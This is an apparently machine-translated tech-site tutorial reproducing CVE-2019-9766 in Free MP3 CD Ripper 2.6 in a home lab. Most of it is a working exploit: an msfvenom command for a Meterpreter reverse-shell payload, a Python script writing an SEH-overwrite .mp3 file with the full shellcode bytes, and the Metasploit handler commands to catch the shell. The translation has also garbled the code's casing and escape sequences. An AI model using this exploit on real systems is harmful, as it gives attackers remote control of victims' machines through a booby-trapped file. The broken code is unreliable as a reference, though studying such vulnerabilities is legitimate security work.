Shulou(Shulou.com)05/31 Report--

This article introduces the recurrence of CVE-2019-9766 loopholes, the content is very detailed, interested friends can refer to, hope to be helpful to you.

CVE-2019-9766 exposes a buffer overflow vulnerability in Free MP3 CDRipper that allows remote attackers to execute arbitrary code by inducing users to open a specially crafted .mp3 file when converting files. It has been tested that the vulnerability affects multiple windows versions, including Windows7 and Windows10 (version 2.6 of Free MP3 CD Ripper is required). Below, we will use metasploit to reproduce the vulnerability of CVE-2019-9766.

Environmental preparation

Attack plane: Kali (it is recommended to change the network card setting to bridge mode) IP 192.168.50.113

Target machine: Windows10 IP 192.168.50.232

First of all, the target needs to install the vulnerable version of Free MP3CD Ripper 2.6, which is the focus. After installation, the figure is as follows:

Generation and monitoring

Open metasploit under kali and generate shellcode: msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.50.113lport=2333-f c-smallest

We use this shellcode to write a script to generate the attack payload. It is important to note that the python2 version should be used.

Buffer= "A" * 4116

NSEH= "\ xeb\ x06\ x90\ x90"

SEH= "\ x84\ x20\ xe4\ x66"

Nops= "\ x90" * 5

Buf= ""

Buf+= "\ xfc\ xe8\ x82\ x00\ x00\ x60\ x89\ xe5\ x31\ xc0\ x64\ x8b\ x50\ x30"

Buf+= "\ x8b\ x52\ x0c\ x8b\ x52\ x14\ x8b\ x72\ x28\ x0f\ xb7\ x4a\ x26\ x31\ xff"

Buf+= "\ xac\ x3c\ x61\ x7c\ X02\ X2C\ x20\ xc1\ xcf\ x0d\ X01\ xc7\ xe2\ xf2\ x52"

Buf+= "\ x57\ x8b\ x52\ x10\ x8b\ x4a\ x3c\ x8b\ x4c\ x11\ x78\ xe3\ x48\ X01\ xd1"

Buf+= "\ x51\ x8b\ x59\ x20\ X01\ xd3\ x8b\ x49\ x18\ xe3\ x3a\ x49\ x8b\ x34\ x8b"

Buf+= "\ X01\ xd6\ X31\ xff\ xac\ xc1\ xcf\ X0d\ X01\ xc7\ x38\ xe0\ x75\ xf6\ x03"

Buf+= "\ x7d\ xf8\ x3b\ x7d\ x24\ x75\ xe4\ x58\ x8b\ x58\ x24\ X01\ xd3\ x66\ x8b"

Buf+= "\ x0c\ x4b\ x8b\ x58\ x1c\ X01\ xd3\ x8b\ x04\ x8b\ X01\ xd0\ x89\ x44\ x24"

Buf+= "\ x24\ x5b\ x5b\ x61\ x59\ x5a\ x51\ xff\ xe0\ x5f\ x5f\ x5a\ x8b\ x12\ xeb"

Buf+= "\ x8d\ x5d\ x68\ x33\ x32\ x00\ x68\ x77\ x73\ x32\ x5f\ x54\ x68\ x4c"

Buf+= "\ x77\ x26\ x07\ x89\ xe8\ xff\ xd0\ xb8\ x90\ X01\ x00\ x00\ x29\ xc4\ x54"

Buf+= "\ x50\ x68\ x29\ x80\ x6b\ x00\ xff\ xd5\ x6a\ x0a\ x68\ xc0\ xa8\ x32\ x71"

Buf+= "\ x68\ x02\ x00\ x09\ x1d\ x89\ xe6\ x50\ x40\ x50\ x40\ x50"

Buf+= "\ x68\ xea\ x0f\ xdf\ xe0\ xff\ xd5\ x97\ x6a\ x10\ x56\ x57\ x68\ x99\ xa5"

Buf+= "\ x74\ x61\ xff\ xd5\ x85\ xc0\ x74\ x0a\ xff\ x4e\ x08\ x75\ xec\ xe8\ x67"

Buf+= "\ x00\ x6a\ x04\ x56\ x57\ x68\ x02\ xd9\ xc8\ x5f\ xff"

Buf+= "\ xd5\ x83\ xf8\ x00\ x7e\ x36\ x8b\ x36\ x6a\ x40\ x68\ x00\ x10\ x00\ x00"

Buf+= "\ x56\ x6a\ x00\ x68\ x58\ xa4\ x53\ xe5\ xff\ xd5\ x93\ x53\ x6a\ x00\ x56"

Buf+= "\ x53\ x57\ x68\ x02\ xd9\ xc8\ x5f\ xff\ xd5\ x83\ xf8\ x00\ x7d\ x28\ x58"

Buf+= "\ x68\ x00\ x40\ x00\ x6a\ x00\ x50\ x68\ x0b\ x2f\ x30\ xff\ xd5"

Buf+= "\ x57\ x68\ x75\ x6e\ x4d\ x61\ xff\ xd5\ x5e\ x5e\ xff\ x0c\ x24\ x0f\ x85"

Buf+= "\ x70\ xff\ xe9\ X9b\ xff\ X01\ xc3\ x29\ xc6\ x75\ xc1"

Buf+= "\ xc3\ xbb\ xf0\ xb5\ xa2\ x56\ x6a\ x00\ x53\ xff\ xd5"

Pad= "B" (316-len (nops)-len (buf))

Payload= buffer + NSEH + SEH + nops + buf + pad

Try:

F=open ("TestFMCR.mp3", "w")

Print "[+] Creating% s bytes mp3File..."% len (payload)

F.write (payload)

F.close ()

Print "[+] mp3 File createdsuccessfully!"

Except:

Print "File cannot be created!"

First put the generated MP3 file to the target machine, then open the msf in the attack machine, set the attack module and monitor (ip, port, etc.)

Msfconsole

Useexploit/multi/handler

Set lhost 192.168.50.113

Set lport 2333

Set payload windows/meterpreter/reverse_tcp

Then start listening:

Exploit

Result

After setting up the monitoring, we will put the prepared MP3 file into the target machine to run. Click convert, select the file, if you do not see the mp3 file here, it may be that he only displays .wav files by default, and change to all files below.

Select and open it directly after selection, and the program begins to read the conversion file.

After running, it may flicker, do not respond, or report an error. After all, this is not a mp3 file. It doesn't matter. We can see that there is a response from the monitoring side.

It has to be said that the exploit value of CVE-2019-9766 vulnerability is relatively low, although the remote code execution caused by buffer overflow, but the premise is that the target machine has installed Free MP3 CD Ripper, and must be version 2.6. So, this vulnerability is also very easy to fix: delete the software or update it to a later version.

On the CVE-2019-9766 loophole recurrence to share here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.